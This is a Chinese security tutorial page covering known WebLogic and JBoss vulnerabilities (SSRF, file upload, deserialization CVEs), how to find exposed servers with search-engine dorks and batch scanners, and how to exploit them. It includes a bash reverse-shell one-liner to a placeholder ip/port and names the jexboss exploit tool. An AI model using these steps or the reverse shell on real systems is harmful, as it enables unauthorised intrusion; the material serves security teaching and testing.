当前位置: 首页 > ops >正文

网安系列【16】之Weblogic和jboss漏洞

文章目录

  • 一 Weblogic
    • 1.1 Weblogic相关漏洞
    • 1.2 Weblogic漏洞发现
    • 1.3 Weblogic漏洞利用
  • 二 Jboss
    • 2.1 Jboss漏洞
    • 2.2 Jboss识别与漏洞利用

一 Weblogic

  • WebLogic 是由 Oracle公司 开发的一款基于Java EE(现称Jakarta EE)的企业级应用服务器,主要用于部署、运行和管理分布式Web应用、企业应用和微服务。
  • 优势:成熟稳定,适合大规模关键业务、深度集成Oracle数据库及其他中间件(如SOA Suite)。
    劣势:配置复杂,学习曲线陡峭、资源占用较高,成本昂贵(相比开源替代品如WildFly/TomEE)。
    在这里插入图片描述

1.1 Weblogic相关漏洞

在这里插入图片描述


主要受影响版本:
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.1
Weblogic 12.2.1.2
Weblogic 12.2.1.3
Weblogic 14.1.1.0


  • 弱口令:Weblogic存在管理后台,通过账号密码登录,由于管理员的疏忽,经常会使用弱口令,或者默认的账户名密码。
  • SSRF漏洞(CVE-2014-4210):Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而可以攻 击内网中redis、fastcgi等脆弱组件。
  • SSRF(Server-Side Request Forgery,服务器端请求伪造)。SSRF是一种安全漏洞,攻击者诱使服务器向内部或外部的非预期系统发起恶意请求,从而绕过访问控制、探测内网或攻击其他服务。
  • 漏洞原理
    1. 攻击者控制目标服务器的请求目标:通过篡改URL、参数或文件上传等功能,让服务器代替攻击者访问内网资源、第三方系统或敏感接口。
    2. 服务器的高权限:服务器通常能访问内网(如数据库、管理后台),而外部用户无法直接到达这些资源。
  • 任意文件上传漏洞 (CVE-2018-2894):Web ServiceTestPage 在"生产模式”下默认不开启,所以该漏洞有一定限制。“利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。
  • XML Dec0der反序列化漏洞(CVE-2017-10271):Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
  • Java反序列化漏洞(CVE-2018-2628):Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授 权的用户在远程服务器执行任意命令。

1.2 Weblogic漏洞发现

  1. 获取资产:shodan、fofa、钟馗之眼等,app="BEA-WebLogic-Server"。 google hackhing inurl:漏洞地址intitle:weblogic等。
  2. 批量扫描脚本:WeblogicScan。
  3. 漏洞路径:_async/AsyncResponseService
    在这里插入图片描述
    在这里插入图片描述

1.3 Weblogic漏洞利用


验证扫描结果(执行命令and反弹shell)

  • 执行扫描命令python3 WeblogicScan -f target.txt,然后利用Java反序列化漏洞利用工具,选择发现的漏洞类型和服务器的地址,进行检查,即可实现命令执行。
    在这里插入图片描述
    在这里插入图片描述
  • 反弹shell
bash -i >& /dev/tcp/ip/port 0>&1

在这里插入图片描述

二 Jboss

  • JBoss(现称 WildFly)是一款开源的、基于Java EE(现Jakarta EE)的应用服务器,由Red Hat公司开发和维护。它用于部署和管理企业级Java应用(如Web服务、分布式系统等),提供高性能、模块化架构和丰富的企业功能。
组件功能说明
Undertow高性能Web服务器(默认替代Tomcat),支持HTTP/2和WebSocket。
Hibernate集成ORM框架,简化数据库操作。
Infinispan分布式缓存系统,用于集群会话共享。
Arquillian测试框架,支持容器内自动化测试。
Management Console Web管理界面(默认端口9990),监控和配置服务器。

2.1 Jboss漏洞


Jboss历史漏洞 (反序列化漏洞)

  • JBoss JMXlnvokerServlet 反序列化漏洞 (CVE-2015-7501)
  • JBossEJBlnvokerServlet反序列化漏洞
  • JBosS AS 6.X 反序列化漏洞(CVE-2017-12149)
  • JBoss 4.xJBossMQJMS 反序列化漏洞(CVE-2017-7504)

Jboss历史漏洞 (访问控制不严导致的漏洞)

  • JMXConsole未授权访问Getshell
  • JMX Console HtmlAdaptor Getshell (CVE-2007-1036)
  • JMX控制台安全验证绕过漏洞(CVE-2010-0738) Administration
  • Console 弱口令 Getshell

2.2 Jboss识别与漏洞利用

  1. Jboss漏洞检测(批量):jbossScan
    在这里插入图片描述
  • CVE-2017-12149漏洞检测:http://ip:8080/invoker/readonly访问该url,若显示状态码为500的报错界面,则证明漏洞存在。
  • CVE-2017-12149漏洞概述:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 Httplnvoker 组件中ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
  • CVE-2017-12149漏洞利用(反弹shell):工具https://github.com/joaomatosf/jexboss。
http://www.xdnf.cn/news/15087.html

相关文章:

  • 二层环路避免-STP技术
  • Transformer架构:结构介绍
  • STM32F103C8T6单片机内部执行原理及启动流程详解
  • 使用Tensorflow和CNN进行猫狗图片训练的实战总结
  • 【CF】⭐Day96——2025武汉ICPC(AILF)
  • MyBatis插件机制揭秘:从拦截器开发到分页插件实战
  • 深度学习_全连接神经网络
  • 单片机基础(STM32-DAY2(GPIO))
  • 如何发现 Redis 中的 BigKey?
  • 【计算机网络】HTTP1.0 HTTP1.1 HTTP2.0 QUIC HTTP3 究极总结
  • STM32 中实现 Modbus RTU
  • OneCode AI注解框架:让传统软件15分钟升级为AI原生应用
  • 从零开始搭建深度学习大厦系列-3.卷积神经网络基础(5-9)
  • 【Note】Linux Kernel 实时技术深入:详解 PREEMPT_RT 与 Xenomai
  • python+django/flask基于微信小程序的农产品管理与销售APP系统
  • 数据仓库:企业数据管理的核心枢纽
  • 20250710解决KickPi的K7的SDK编译异常:rk3576-android14.0-25250704.tar.gz【降低BUILD_JOBS】
  • OrCAD 24.1补丁005中文界面切换指南
  • RT-Thread 的 SCons 构建系统的语法、常用用法,并举例说明如何编写典型的 `Kconfig` 和 `SConscript` 文件
  • 解析几何几百年重大错误:将无穷多各异圆盘(球)误为同一点集
  • PyTorch Tensor 的创建与操作入门
  • TCP-与-UDP-协议详解:原理、区别与应用场景全解析
  • 使用SpringAOP自定义权限控制注解
  • UE5 Rotate 3 Axis In One Material
  • Android Studio 打 release 包 Algorithm HmacPBESHA256 not available 问题解决
  • Vue 中监测路由变化时,通常不需要开启深度监听(deep: true)
  • Linux中rw-rw-r--相关的访问权限讲解
  • android TabLayout 标题栏切换 事件拦截
  • 达梦数据库不兼容 SQL_NO_CACHE 报错解决方案
  • 三、神经网络——网络优化方法